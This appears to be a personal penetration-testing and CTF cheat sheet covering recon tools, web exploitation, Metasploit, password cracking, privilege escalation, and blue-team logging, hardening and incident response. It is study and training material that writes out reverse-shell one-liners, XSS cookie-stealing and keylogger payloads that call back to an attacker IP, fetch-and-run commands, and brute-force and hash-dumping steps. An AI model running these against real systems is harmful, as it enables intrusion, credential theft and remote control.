Reconnaissance
Nmap
Network Mapper — the essential first tool in any pentest. Maps open ports, detects services, versions, and OS. Always start here.
My workflow: Fast scan all ports first (
-p-), then targeted -sC -sV on only the open ones. Saves a ton of time.Core Scans
Quick scan — top 1000 ports
nmap <target-ip>
All 65535 ports
nmap -p- <target-ip>
Service + version detection
nmap -sC -sV <target-ip>
Full recon — scripts, versions, save output
nmap -sC -sV -p- <target-ip> -oN nmap.txt
Aggressive scan (OS + traceroute + scripts)
nmap -A <target-ip>
SYN stealth scan (requires root)
sudo nmap -sS <target-ip>
UDP scan (slow — use on specific ports)
sudo nmap -sU -p 53,67,68,161,162 <target-ip>
Ping sweep — find live hosts
nmap -sn 192.168.1.0/24
NSE Scripts
Vulnerability scan
nmap --script vuln <target-ip>
SMB vulnerability check (EternalBlue etc)
nmap --script smb-vuln* -p 445 <target-ip>
HTTP enumeration scripts
nmap --script http-enum,http-title -p 80,443 <target-ip>
FTP anonymous login check
nmap --script ftp-anon -p 21 <target-ip>
Key Flags Reference
| Flag | Description |
|---|---|
| -sS | SYN stealth (half-open) scan — requires root |
| -sU | UDP scan — slow, use on specific ports |
| -sC | Run default NSE scripts |
| -sV | Service/version detection |
| -O | OS detection |
| -A | Aggressive: OS + version + scripts + traceroute |
| -T4 | Faster timing (T0=paranoid → T5=insane) |
| -p- | Scan all 65535 ports |
| -oN / -oX / -oG | Save as normal / XML / grepable |
| -v / -vv | Verbose output |
| --script vuln | Vulnerability detection scripts |
| --open | Only show open ports |
Legal: Only scan systems you own or have explicit written permission to test. Unauthorized scanning is illegal.
Reconnaissance
Gobuster / Ffuf
Web content discovery tools. Gobuster is the go-to for directory and DNS brute-forcing; Ffuf is faster and more flexible, great for fuzzing parameters, virtual hosts, and more.
Tip: Always add
-x php,html,txt,bak,zip — many CTF flags hide in backup files or non-obvious extensions.Gobuster
Basic directory scan
gobuster dir -u http://<target> -w /usr/share/wordlists/dirb/common.txt
With extensions — find hidden files
gobuster dir -u http://<target> -w common.txt -x php,html,txt,bak,zip
Add cookies (authenticated scan)
gobuster dir -u http://<target> -w common.txt -c "session=abc123"
DNS subdomain enumeration
gobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Virtual host discovery
gobuster vhost -u http://target.com -w subdomains.txt --append-domain
Ffuf
Directory fuzzing
ffuf -u http://<target>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt
Filter by response size (remove false positives)
ffuf -u http://<target>/FUZZ -w common.txt -fs 4242
Parameter fuzzing (GET)
ffuf -u "http://<target>/page?FUZZ=value" -w params.txt
Virtual host fuzzing
ffuf -u http://<target> -H "Host: FUZZ.target.com" -w subdomains.txt -fs 0
Best Wordlists
| Wordlist | Use Case |
|---|---|
| dirb/common.txt | Quick starting point, fast |
| dirbuster/directory-list-2.3-medium.txt | More thorough directory scan |
| SecLists/Discovery/Web-Content/raft-large-directories.txt | Most comprehensive |
| SecLists/Discovery/DNS/subdomains-top1million-5000.txt | Subdomain enumeration |
| SecLists/Discovery/Web-Content/common.txt | Good all-rounder for ffuf |
Reconnaissance
SMB Enumeration
SMB (ports 139/445) is one of the most common attack surfaces in CTFs and real engagements. Anonymous access, weak credentials, and unpatched exploits (EternalBlue) are frequent findings.
Tip: Always check for null/anonymous SMB sessions first — they often give you usernames and shares without needing credentials at all.
Enumeration
Full SMB enumeration (users, shares, OS)
enum4linux -a <target-ip>
List shares (anonymous)
smbclient -L //<target-ip> -N
Connect to a share
smbclient //<target-ip>/sharename -N
Connect with credentials
smbclient //<target-ip>/sharename -U username
Download all files from share
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
smb: \> prompt OFF
smb: \> mget *
CrackMapExec — check creds across network
crackmapexec smb <target-ip> -u username -p password
Nmap SMB Scripts
Check for known SMB vulnerabilities
nmap --script smb-vuln* -p 445 <target-ip>
Enumerate users and shares
nmap --script smb-enum-shares,smb-enum-users -p 445 <target-ip>
Common Findings
| Finding | What to Do |
|---|---|
| Anonymous/null session | Run enum4linux, browse shares with -N flag |
| Readable shares | Look for passwords, config files, scripts |
| Writable shares | Drop a .scf or .lnk file to capture NTLMv2 hash via Responder |
| EternalBlue (MS17-010) | Use Metasploit exploit/windows/smb/ms17_010_eternalblue |
| Usernames found | Feed into Hydra or Kerbrute for password attacks |
Web Exploitation
Burp Suite
The industry-standard web application security testing toolkit. Intercept, modify, and replay HTTP/S traffic. Essential for web pentesting, bug bounty, and CTFs.
Setup: Install FoxyProxy in your browser, point it to
127.0.0.1:8080. For HTTPS, visit http://burp with proxy on and install the CA cert.Core Workflow
| Feature | How to Use |
|---|---|
| Intercept | Proxy → Intercept ON → browse target → modify & forward |
| Repeater | Right-click request → Send to Repeater → tweak & resend manually |
| Intruder | Send to Intruder → mark payload positions (§§) → load wordlist → Attack |
| Decoder | Decode/encode Base64, URL, HTML, Hex on the fly |
| Comparer | Diff two requests/responses to spot subtle differences |
| Scanner | Pro only — passive/active automated vuln scanning |
Useful Tricks
Launch Burp Suite on Kali
burpsuite # proxy runs on 127.0.0.1:8080
Intercept + modify a request
# Proxy → Intercept ON → browse → edit params in raw tab → Forward
Brute-force login with Intruder (Sniper)
# Right-click request → Send to Intruder
# Mark password field: §value§
# Payloads tab → load rockyou.txt → Start Attack
# Mark password field: §value§
# Payloads tab → load rockyou.txt → Start Attack
Test IDOR — change user ID in Repeater
# GET /api/user?id=1 → Repeater → change id=2,3... → check response
Save request to file (for sqlmap)
# Right-click request → Save item → use with sqlmap -r request.txt
Free vs Pro: Community edition is enough for CTFs. Intruder is rate-limited in free version — use Hydra for fast brute-forcing instead.
Web Exploitation
SQLMap
Automated SQL injection detection and exploitation. Can enumerate databases, dump tables, read/write files, and even get a shell depending on DBMS privileges.
Warning: SQLMap can be loud and cause damage. Only use on systems you have permission to test. Use
--level and --risk flags carefully.Basic Usage
Test URL for SQLi
sqlmap -u "http://target.com/page?id=1"
List all databases
sqlmap -u "http://target.com/page?id=1" --dbs
List tables in a database
sqlmap -u "http://target.com/page?id=1" -D dbname --tables
Dump a specific table
sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump
Use Burp request file (best for POST/cookies)
sqlmap -r request.txt --dbs
Test with cookie authentication
sqlmap -u "http://target.com/page?id=1" --cookie="session=abc123" --dbs
Attempt to get OS shell
sqlmap -u "http://target.com/page?id=1" --os-shell
Useful Flags
| Flag | Description |
|---|---|
| --level 1-5 | Test intensity (default 1, use 3+ for thorough) |
| --risk 1-3 | Risk of payloads (1=safe, 3=includes heavy tests) |
| --batch | Non-interactive, auto-answer all prompts |
| --forms | Auto-detect and test forms on the page |
| --random-agent | Use random User-Agent to evade basic WAFs |
| --technique=U | Specify injection type: B(oolean), E(rror), U(nion), T(ime) |
Web Exploitation
XSS Notes
Cross-Site Scripting — injecting scripts into pages viewed by other users. OWASP Top 10. Can lead to session hijacking, credential theft, keylogging, and account takeover.
XSS Types
| Type | How It Works | Impact |
|---|---|---|
| Reflected | Payload in URL, reflected in response. Victim must click crafted link. | Session theft, phishing |
| Stored | Payload saved in DB, fires for every visitor. Most dangerous. | Wormable, mass compromise |
| DOM-based | Vulnerable client-side JS reads attacker-controlled DOM source. | Same as above, harder to detect |
Test Payloads
Basic alert — confirm XSS fires
<script>alert(1)</script>
Image onerror — bypass <script> filters
<img src=x onerror=alert(1)>
SVG onload
<svg onload=alert(1)>
Event handler in attribute context
" onmouseover="alert(1)
Cookie stealer — send to your server
<script>new Image().src='http://YOUR-IP/?c='+document.cookie</script>
Keylogger snippet
<script>document.onkeypress=e=>fetch('http://YOUR-IP/?k='+e.key)</script>
WAF Bypass Techniques
Case mixing
<ScRiPt>alert(1)</ScRiPt>
HTML entity encoding
<img src=x onerror=alert(1)>
JavaScript URI
<a href="javascript:alert(1)">click</a>
Blind XSS: Use XSS Hunter (xsshunter.com) or Burp Collaborator — they generate unique payloads and notify you when they fire in an admin panel you can't see.
Web Exploitation
Nikto
Web server scanner that checks for dangerous files, outdated software, misconfigurations, and known vulnerabilities. Noisy but comprehensive — great for a first pass on any web target.
Nikto is loud. It will definitely appear in server logs. Only use with permission.
Common Commands
Basic scan
nikto -h http://<target>
Scan HTTPS target
nikto -h https://<target> -ssl
Specify port
nikto -h <target> -p 8080
Scan through Burp proxy
nikto -h http://<target> -useproxy http://127.0.0.1:8080
Save output to file
nikto -h http://<target> -o nikto.txt
What Nikto Finds
| Finding | Significance |
|---|---|
| Server version disclosure | Check if version has known CVEs |
| /admin, /backup, /test | Common sensitive paths exposed |
| Default credentials | Test for vendor default logins |
| Dangerous HTTP methods | PUT/DELETE enabled — possible file upload/delete |
| Missing security headers | X-Frame-Options, CSP, HSTS missing |
| Outdated software | Apache, PHP, WordPress versions with CVEs |
Exploitation
Metasploit Framework
The world's most-used penetration testing framework. Hundreds of exploits, payloads, and post-exploitation modules covering the full attack lifecycle.
Core Workflow
Start Metasploit console
msfconsole
Search for a module
msf6> search eternalblue
Use, configure, and run a module
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS <target-ip>
msf6> set LHOST <your-ip>
msf6> set LPORT 4444
msf6> show options
msf6> run
msf6> set RHOSTS <target-ip>
msf6> set LHOST <your-ip>
msf6> set LPORT 4444
msf6> show options
msf6> run
Background session & list sessions
meterpreter> background
msf6> sessions -l
msf6> sessions -i 1
msf6> sessions -l
msf6> sessions -i 1
Meterpreter Post-Exploitation
System info + whoami
meterpreter> sysinfo
meterpreter> getuid
meterpreter> getuid
Dump password hashes
meterpreter> hashdump
Privilege escalation attempt
meterpreter> getsystem
Upload / download files
meterpreter> upload /path/to/file.exe C:\Users\Public
meterpreter> download C:\flag.txt
meterpreter> download C:\flag.txt
Drop into system shell
meterpreter> shell
Msfvenom — Payload Generator
Windows reverse shell EXE
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=4444 -f exe -o shell.exe
Linux reverse shell ELF
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=4444 -f elf -o shell.elf
PHP webshell
msfvenom -p php/reverse_php LHOST=<ip> LPORT=4444 -f raw -o shell.php
List all payloads
msfvenom -l payloads | grep linux
Legal: Only use Metasploit on systems you own or have explicit written permission to test.
Exploitation
Reverse Shells
A reverse shell makes the target connect back to your listener. Set up your listener first, then execute the payload on the target.
Start a Listener
Netcat listener
nc -lvnp 4444
Metasploit multi/handler (for meterpreter)
msf6> use multi/handler
msf6> set payload linux/x64/shell_reverse_tcp
msf6> set LHOST <your-ip>
msf6> run
msf6> set payload linux/x64/shell_reverse_tcp
msf6> set LHOST <your-ip>
msf6> run
Shell One-Liners
Bash TCP
bash -i >& /dev/tcp/<your-ip>/4444 0>&1
Python 3
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("<ip>",4444));[os.dup2(s.fileno(),x) for x in range(3)];subprocess.call(["/bin/sh"])'
PHP
php -r '$sock=fsockopen("<ip>",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Netcat (with -e)
nc <your-ip> 4444 -e /bin/bash
PowerShell (Windows)
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('<ip>',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$sb=([text.encoding]::ASCII).GetBytes($r);$s.Write($sb,0,$sb.Length)}"
Upgrade to Full TTY
Step 1 — Spawn PTY with Python
python3 -c 'import pty;pty.spawn("/bin/bash")'
Step 2 — Background & fix terminal
# Ctrl+Z to background
stty raw -echo; fg
# Press Enter twice, then:
export TERM=xterm
stty raw -echo; fg
# Press Enter twice, then:
export TERM=xterm
Generator: Visit revshells.com for an interactive generator supporting dozens of languages, with URL encoding and base64 options.
Exploitation
File Transfer
Getting tools and files onto (and off) a target is a critical skill. These are the methods that work in most CTF and real-world scenarios.
Serving Files from Your Attack Machine
Python HTTP server (most common)
python3 -m http.server 8000
PHP server
php -S 0.0.0.0:8000
Netcat — send a file
# Receiver: nc -lvnp 4444 > file.txt
# Sender: nc <receiver-ip> 4444 < file.txt
# Sender: nc <receiver-ip> 4444 < file.txt
Downloading on the Target (Linux)
wget
wget http://<your-ip>:8000/linpeas.sh -O /tmp/linpeas.sh
curl
curl http://<your-ip>:8000/linpeas.sh -o /tmp/linpeas.sh
Download and pipe directly (no file on disk)
curl http://<your-ip>:8000/linpeas.sh | bash
Downloading on the Target (Windows)
PowerShell wget
powershell -c "Invoke-WebRequest -Uri 'http://<ip>:8000/shell.exe' -OutFile 'C:\Users\Public\shell.exe'"
PowerShell (short form)
powershell -c "IWR 'http://<ip>:8000/file.exe' -O 'C:\Users\Public\file.exe'"
certutil (bypasses some restrictions)
certutil -urlcache -split -f http://<ip>:8000/file.exe file.exe
Impacket SMB server (for SMB transfers)
impacket-smbserver share . -smb2support
# Windows: copy \<your-ip>\share ile.exe .
# Windows: copy \<your-ip>\share ile.exe .
Password Attacks
Hydra
Fast parallelised network login cracker. Supports SSH, FTP, HTTP, SMB, RDP, MySQL, and dozens more protocols. The go-to tool for online brute-forcing.
Common Attacks
SSH brute-force (known username)
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://<target-ip>
SSH with user list + password list
hydra -L users.txt -P rockyou.txt ssh://<target-ip>
FTP brute-force
hydra -l admin -P rockyou.txt ftp://<target-ip>
HTTP POST login form
hydra -l admin -P rockyou.txt <ip> http-post-form "/login:user=^USER^&pass=^PASS^:Invalid credentials"
RDP brute-force
hydra -l administrator -P rockyou.txt rdp://<target-ip>
SMB brute-force
hydra -l admin -P rockyou.txt smb://<target-ip>
Key Flags
| Flag | Description |
|---|---|
| -l / -L | Single username / username list file |
| -p / -P | Single password / password list file |
| -t | Parallel tasks per target (default 16) |
| -f | Stop after first valid login found |
| -V | Verbose — show every attempt |
| -s | Custom port (e.g. -s 2222 for SSH on non-standard port) |
| -o | Save found credentials to file |
Password Attacks
John the Ripper / Hashcat
Offline password crackers. John auto-detects hash formats and is great for CTFs; Hashcat uses GPU acceleration and is faster for large hash sets on your own hardware.
John the Ripper
Auto-detect hash & crack
john hashes.txt
Crack with rockyou wordlist
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
Specify hash format manually
john hashes.txt --format=NT --wordlist=rockyou.txt
Show cracked passwords
john hashes.txt --show
Crack Linux /etc/shadow
unshadow /etc/passwd /etc/shadow > combined.txt
john combined.txt --wordlist=rockyou.txt
john combined.txt --wordlist=rockyou.txt
Crack zip password
zip2john protected.zip > zip.hash
john zip.hash --wordlist=rockyou.txt
john zip.hash --wordlist=rockyou.txt
Crack SSH private key passphrase
ssh2john id_rsa > id_rsa.hash
john id_rsa.hash --wordlist=rockyou.txt
john id_rsa.hash --wordlist=rockyou.txt
Hashcat
Crack MD5 hashes with rockyou
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
NTLM hashes (Windows)
hashcat -m 1000 hashes.txt rockyou.txt
bcrypt hashes
hashcat -m 3200 hashes.txt rockyou.txt
Rule-based attack (better coverage)
hashcat -m 0 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
Common Hash Mode Numbers
| Mode | Hash Type |
|---|---|
| 0 | MD5 |
| 100 | SHA1 |
| 1400 | SHA256 |
| 1000 | NTLM (Windows) |
| 3200 | bcrypt |
| 13100 | Kerberoast (TGS-REP) |
Identify unknown hashes: Use hash-identifier (CLI) or hashes.com/en/tools/hash_identifier (web) to figure out the format before cracking.
Privilege Escalation
LinPEAS / WinPEAS
PEASS-ng — automated post-exploitation enumeration scripts. After you land a shell, run this immediately. It colour-codes everything by severity so you know exactly where to look.
Getting It onto the Target
1. Serve from your attack machine
python3 -m http.server 8000
2. Download and run on target (no file on disk)
curl http://<your-ip>:8000/linpeas.sh | sh
Save output to review later
./linpeas.sh | tee /tmp/lp.txt 2>&1
WinPEAS (Windows PowerShell)
powershell -c "IWR 'http://<ip>:8000/winPEASany.exe' -O $env:TEMP\wp.exe; $env:TEMP\wp.exe"
Colour guide: Red/Yellow highlight = 95% privesc vector — check these first. Red = high interest. Yellow = config issues worth reviewing.
What to Look For in Output
| Section | What It Means |
|---|---|
| Sudo -l | Binaries you can sudo → check GTFOBins immediately |
| SUID/SGID binaries | Non-standard SUID binaries → GTFOBins |
| Writable cron jobs | You can inject commands that run as root |
| Passwords in files | Config files, history files, env variables |
| Capabilities | cap_setuid+ep on python/perl → instant root |
| Network connections | Internal services only accessible from localhost |
Privilege Escalation
Linux PrivEsc Notes
Manual checks and techniques for escalating privileges on Linux. Always run LinPEAS first, then use these for manual follow-up on interesting findings.
Situational Awareness
Who am I, what groups?
id && whoami && groups
OS version + kernel
uname -a && cat /etc/os-release
Sudo permissions
sudo -l
Running processes (as root?)
ps aux | grep root
Environment variables (passwords?)
env && cat ~/.bash_history
Common Vectors
Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
Find SGID binaries
find / -perm -2000 -type f 2>/dev/null
Check cron jobs
cat /etc/crontab
ls -la /etc/cron.d/ /etc/cron.daily/ /var/spool/cron/crontabs/
ls -la /etc/cron.d/ /etc/cron.daily/ /var/spool/cron/crontabs/
World-writable files
find / -writable -type f 2>/dev/null | grep -v proc
Check capabilities
getcap -r / 2>/dev/null
NFS shares (no_root_squash?)
cat /etc/exports
Passwords in config files
grep -r "password" /etc /var /home 2>/dev/null | grep -v Binary
GTFOBins Quick Escapes
GTFOBins (gtfobins.github.io) — if you can sudo or SUID a binary, look it up here for a one-liner root escape.
sudo vim
sudo vim -c ':!/bin/bash'
sudo find
sudo find . -exec /bin/bash \; -quit
sudo python3
sudo python3 -c 'import os;os.system("/bin/bash")'
sudo less / man
sudo less /etc/passwd # then type: !/bin/bash
sudo awk
sudo awk 'BEGIN {system("/bin/bash")}'
Capability privesc (python has cap_setuid)
python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
My Notes
Steganography
Hidden data inside images, audio, and files. A common CTF category — flags are often embedded in JPGs, PNGs, WAV files, or disguised using file format tricks.
Methodology: Always check file type → metadata → strings → binwalk → steghide/zsteg. Work through the checklist systematically.
Initial Checks
Check real file type (ignore extension)
file suspicious_file
Extract all metadata (EXIF)
exiftool file.jpg
Look for hidden strings
strings file.jpg | grep -i "flag\|ctf\|pass\|key\|secret"
Hex dump — look at file headers
xxd file.jpg | head -20
File Carving & Extraction
Binwalk — find embedded files
binwalk file.jpg
Binwalk — extract embedded files
binwalk -e file.jpg
Foremost — carve by file signature
foremost -i file.jpg -o output/
Steghide — extract hidden data
steghide extract -sf file.jpg
Steghide — with password
steghide extract -sf file.jpg -p password
Zsteg — PNG/BMP LSB steganography
zsteg file.png
Stegseek — brute-force steghide passphrase
stegseek file.jpg /usr/share/wordlists/rockyou.txt
Audio Steganography
Strings in WAV
strings audio.wav | grep -i "flag\|ctf"
Spectogram (open in Sonic Visualiser or Audacity)
# Open file in Audacity → View → Spectrogram — look for text/images in frequencies
Common File Magic Bytes
| Magic Bytes (hex) | File Type |
|---|---|
| FF D8 FF | JPEG/JPG |
| 89 50 4E 47 | PNG |
| 47 49 46 38 | GIF |
| 50 4B 03 04 | ZIP (also DOCX, XLSX, JAR) |
| 25 50 44 46 | |
| 7F 45 4C 46 | ELF (Linux executable) |
| 4D 5A | MZ — Windows EXE/DLL |
My Notes
CTF Tips
Personal methodology for CTF challenges — built from TryHackMe, PicoCTF, and my own cyb3rak:hack series.
My Methodology
1. Enumerate first — always. Don't rush to exploit. Nmap every port, gobuster every directory. The more you enumerate, the more attack surface you find.
2. Document everything. One .txt file per machine. Every port, service, username, password, finding. You will forget things and you will thank yourself later.
3. Check the obvious. robots.txt, /admin, page source, JS files, default creds (admin:admin, admin:password). These catch more flags than you'd expect.
4. Version numbers matter. Any service version you find → searchsploit, ExploitDB, CVE search. The path to root is often a known CVE that just needs a number.
5. Stuck? Step back and re-enumerate. You almost certainly missed something. Re-read Nmap output. Run Gobuster with a different wordlist. Check if you missed a port.
6. Google everything. "service name exploit", "CVE-XXXX-XXXX PoC", "HTB machine name walkthrough". The community has seen it. HackTricks is your bible.
Port Cheatsheet
| Port | Service | Attack Angle |
|---|---|---|
| 21 | FTP | Anonymous login → ftp <ip>, user: anonymous. Version CVEs. |
| 22 | SSH | Username enum, brute-force (Hydra), default/weak creds, weak key |
| 23 | Telnet | Cleartext — default creds, sniff with Wireshark |
| 25 | SMTP | User enumeration with VRFY/EXPN |
| 53 | DNS | Zone transfer: dig axfr @<ip> domain.com |
| 80/443 | HTTP/S | Gobuster, robots.txt, source, Burp, Nikto, SQLi, XSS |
| 110/143 | POP3/IMAP | Email access — brute-force or default creds |
| 139/445 | SMB | Null session, enum4linux, smbclient, EternalBlue |
| 3306 | MySQL | Default creds (root:root, root:blank), remote login |
| 3389 | RDP | Brute-force (Hydra), BlueKeep (CVE-2019-0708) |
| 5985/5986 | WinRM | evil-winrm if you have creds |
| 6379 | Redis | Unauthenticated access — read/write data, RCE possible |
Quick Wins Checklist
Web: Check robots.txt, /sitemap.xml, /.git/, /.env, /backup, /config, view-source for comments and API keys.
Credentials: Try admin:admin, admin:password, admin:<machine-name>, user:user. Also check passwords found elsewhere in the box (password reuse is common in CTFs).
After shell: Run LinPEAS immediately. Check sudo -l. Look for SUID. Check /opt, /home/*/.
Hunt for flags in /root/root.txt, /home/user/user.txt — the standard CTF locations.
Hunt for flags in /root/root.txt, /home/user/user.txt — the standard CTF locations.
Encoding: See something weird? Try base64 decode, ROT13, hex decode, URL decode. Use CyberChef (gchq.github.io/CyberChef) for everything.
Certification
eJPT Notes
Personal notes from passing the eJPT (eLearnSecurity Junior Penetration Tester) in 2026. Open-book, practical exam — these are the things that matter most.
Full writeup: How I Passed the eJPT in 2026 →
What Actually Matters
Networking first. Understand subnets, CIDR, and routing. The exam has multi-subnet scenarios — know how to add routes and pivot through networks using Metasploit's autoroute.
Enumerate thoroughly. It's open-book. Slow down, run full Nmap scans, check every service. The questions are specific — the answers are in your enumeration output.
Web basics. Directory brute-forcing, basic SQLi (manual and sqlmap), login brute-forcing with Hydra. Gobuster + Hydra handle most web questions.
Metasploit workflow. search → use → show options → set RHOSTS/LHOST → run. Know how to use multi/handler, autoroute, and the post exploitation modules.
Take notes as you go. The exam is 48h but you can do it in 4-6h if prepared. Write down every IP, open port, cred, and finding. Many questions connect.
Best Study Resources
| Resource | Why It Helps |
|---|---|
| INE Free Starter Pass | Official course — covers every tested topic, labs included |
| TryHackMe Jr Pentester Path | Best practical hands-on prep — do this before the exam |
| HackTheBox Starting Point | Builds confidence with real machines at beginner level |
| youtube.com/@Cyb3rak | My walkthroughs and tool guides cover eJPT topics directly |
Defense
Blue Team Basics
Understanding the defender's perspective makes you a better attacker — and a more well-rounded security professional. Blue team work is about detection, visibility, and response.
Core mindset: Attackers need to succeed once. Defenders need to succeed every time. Focus on visibility — you can only respond to what you can see.
Key Windows Event IDs
| Event ID | What It Means | Why It Matters |
|---|---|---|
| 4624 | Successful logon | Baseline logins; alert on anomalous times/IPs |
| 4625 | Failed logon | Brute-force attempts — many in short time = attack |
| 4648 | Logon with explicit credentials | Lateral movement indicator (pass-the-hash) |
| 4672 | Admin privileges assigned | Privilege escalation or admin account use |
| 4688 | New process created | Detect suspicious child processes (cmd.exe from Word) |
| 4698 | Scheduled task created | Persistence mechanism — attackers love scheduled tasks |
| 4720 | New user account created | Persistence — attacker creating backdoor accounts |
| 4776 | NTLM auth attempt | NTLM relay/pass-the-hash attacks |
| 7045 | New service installed | Malware persistence via services |
Linux Log Files to Monitor
| Log File | What It Contains |
|---|---|
| /var/log/auth.log | SSH logins, sudo use, failed auth attempts (Debian/Ubuntu) |
| /var/log/secure | Same as above on RHEL/CentOS |
| /var/log/syslog | General system activity, service starts/stops |
| /var/log/apache2/access.log | Web requests — look for SQLi, path traversal, scanners |
| /var/log/apache2/error.log | Application errors, often reveals attack attempts |
| /var/log/fail2ban.log | IPs blocked by fail2ban — shows who was brute-forcing |
| /root/.bash_history | Commands run as root — check for attacker activity |
Quick Log Analysis Commands
Failed SSH logins
grep "Failed password" /var/log/auth.log | tail -20
Successful SSH logins
grep "Accepted" /var/log/auth.log | tail -20
Top attacking IPs
grep "Failed password" /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -rn | head -10
Sudo usage history
grep "sudo" /var/log/auth.log | grep "COMMAND"
Look for web scanner signatures in Apache logs
grep -i "nikto\|sqlmap\|nmap\|masscan\|zgrab" /var/log/apache2/access.log
Find recently modified files (possible tampering)
find /var/www /etc -mtime -1 -type f 2>/dev/null
Free SIEM: Look into Splunk Free (500MB/day) or Elastic Stack (ELK) for centralised log management and alerting on your home lab.
Defense
Linux Hardening
Hardening a Linux system means removing attack surface. Everything LinPEAS flags as a finding is something that can be fixed. Use this as a post-deployment checklist.
Think like an attacker: After hardening, run LinPEAS on your own system. If it finds nothing interesting, you did a good job.
User & Access Controls
List all users with login shells
grep -v "/nologin\|/false" /etc/passwd
Lock unused accounts
sudo usermod -L username
Disable root SSH login
# /etc/ssh/sshd_config:
PermitRootLogin no
PasswordAuthentication no
sudo systemctl restart sshd
PermitRootLogin no
PasswordAuthentication no
sudo systemctl restart sshd
Set strong password policy
sudo apt install libpam-pwquality
# /etc/security/pwquality.conf: minlen=12, dcredit=-1, ucredit=-1
# /etc/security/pwquality.conf: minlen=12, dcredit=-1, ucredit=-1
Check for accounts with empty passwords
sudo awk -F: '$2 == "" {print $1}' /etc/shadow
File Permissions & SUID
Find non-standard SUID binaries
find / -perm -4000 -type f 2>/dev/null | grep -v "/bin/\|/sbin/\|/usr/bin/\|/usr/sbin/"
Remove SUID from a binary
sudo chmod u-s /path/to/binary
Find world-writable directories
find / -perm -0002 -type d 2>/dev/null | grep -v proc
Secure /tmp (noexec, nosuid)
# In /etc/fstab:
tmpfs /tmp tmpfs defaults,noexec,nosuid,nodev 0 0
tmpfs /tmp tmpfs defaults,noexec,nosuid,nodev 0 0
Network & Services
List all listening ports and services
ss -tlnp
Disable an unneeded service
sudo systemctl stop servicename
sudo systemctl disable servicename
sudo systemctl disable servicename
UFW firewall — allow only SSH + HTTP/S
sudo ufw default deny incoming
sudo ufw allow 22/tcp
sudo ufw allow 80,443/tcp
sudo ufw enable
sudo ufw allow 22/tcp
sudo ufw allow 80,443/tcp
sudo ufw enable
Install fail2ban (auto-block brute-force)
sudo apt install fail2ban
sudo systemctl enable --now fail2ban
sudo systemctl enable --now fail2ban
Hardening Checklist
| Item | Action | Priority |
|---|---|---|
| SSH config | Disable root login, password auth, use key-based auth only | Critical |
| Unused services | Stop and disable anything not needed | Critical |
| Firewall | Default deny, whitelist only required ports | Critical |
| Automatic updates | Enable unattended-upgrades for security patches | High |
| fail2ban | Install and configure for SSH, HTTP | High |
| SUID binaries | Audit and remove unnecessary SUID bits | High |
| Sudo rules | Use least privilege — no NOPASSWD for dangerous binaries | High |
| Cron jobs | Review all cron jobs, ensure scripts aren't world-writable | Medium |
| Logging | Enable and centralise system logs, set up alerts | Medium |
| /tmp noexec | Mount /tmp with noexec,nosuid options | Medium |
Defense
Traffic Analysis
Capturing and analysing network traffic to detect attacks, understand protocols, and investigate incidents. Wireshark for GUI analysis; tcpdump for quick CLI captures.
tcpdump
Capture all traffic on interface
sudo tcpdump -i eth0
Capture and save to .pcap file
sudo tcpdump -i eth0 -w capture.pcap
Filter by host
sudo tcpdump -i eth0 host 192.168.1.100
Filter by port
sudo tcpdump -i eth0 port 80
Capture only HTTP GET requests
sudo tcpdump -i eth0 -A 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep "GET\|POST\|Host"
Read a .pcap file
tcpdump -r capture.pcap
Wireshark Filters (Display)
| Filter | What It Shows |
|---|---|
| http | All HTTP traffic |
| http.request.method == "POST" | POST requests only — find login attempts, form submissions |
| ip.addr == 10.10.10.1 | All traffic to/from a specific IP |
| tcp.port == 4444 | Potential reverse shell traffic on port 4444 |
| dns | All DNS queries — spot DNS tunnelling or exfil |
| ftp | FTP traffic — credentials are cleartext |
| tcp.flags.syn == 1 && tcp.flags.ack == 0 | SYN packets only — detect port scans |
| frame contains "password" | Search all frames for the word "password" |
| !(arp or dns or icmp) | Hide noisy protocols to see actual traffic |
What to Look For
| Pattern | Possible Indicator |
|---|---|
| Many SYN packets, no completion | Port scan (nmap -sS) |
| Sequential port connections | Port scan or automated tool |
| Large outbound DNS queries | DNS tunnelling / data exfiltration |
| Cleartext credentials in HTTP/FTP/Telnet | Credential exposure |
| Outbound connection on unusual port (4444, 1337) | Reverse shell / C2 beacon |
| Large data transfer to unknown external IP | Data exfiltration |
| Repeated failed auths from one IP | Brute-force attack |
| ARP replies without requests | ARP spoofing / MITM attack |
Defense
Incident Response
What to do when a system is compromised. Speed and methodology matter — act fast but document everything. The goal is: contain, investigate, recover, learn.
IR Phases: Preparation → Identification → Containment → Eradication → Recovery → Lessons Learned
Initial Triage (Linux)
Who is logged in right now?
w && who && last | head -20
Active network connections
ss -antp | grep ESTABLISHED
Suspicious processes (what's running?)
ps aux | sort -rk 3 | head -20 # sort by CPU usage
Recently created/modified files
find / -mtime -1 -type f 2>/dev/null | grep -v "/proc\|/sys\|/run"
Cron jobs (persistence mechanisms)
crontab -l && cat /etc/crontab && ls /etc/cron.d/
New users added recently
grep -v "nologin\|false" /etc/passwd | awk -F: '{print $1, $3}' | sort -k2 -n
Check ~/.ssh/authorized_keys for backdoors
find /home /root -name "authorized_keys" -exec cat {} \;
Check for unusual SUID files (added by attacker)
find / -perm -4000 -type f -mtime -7 2>/dev/null
Memory & Process Investigation
List open files for a suspicious process
lsof -p <PID>
Find process by port
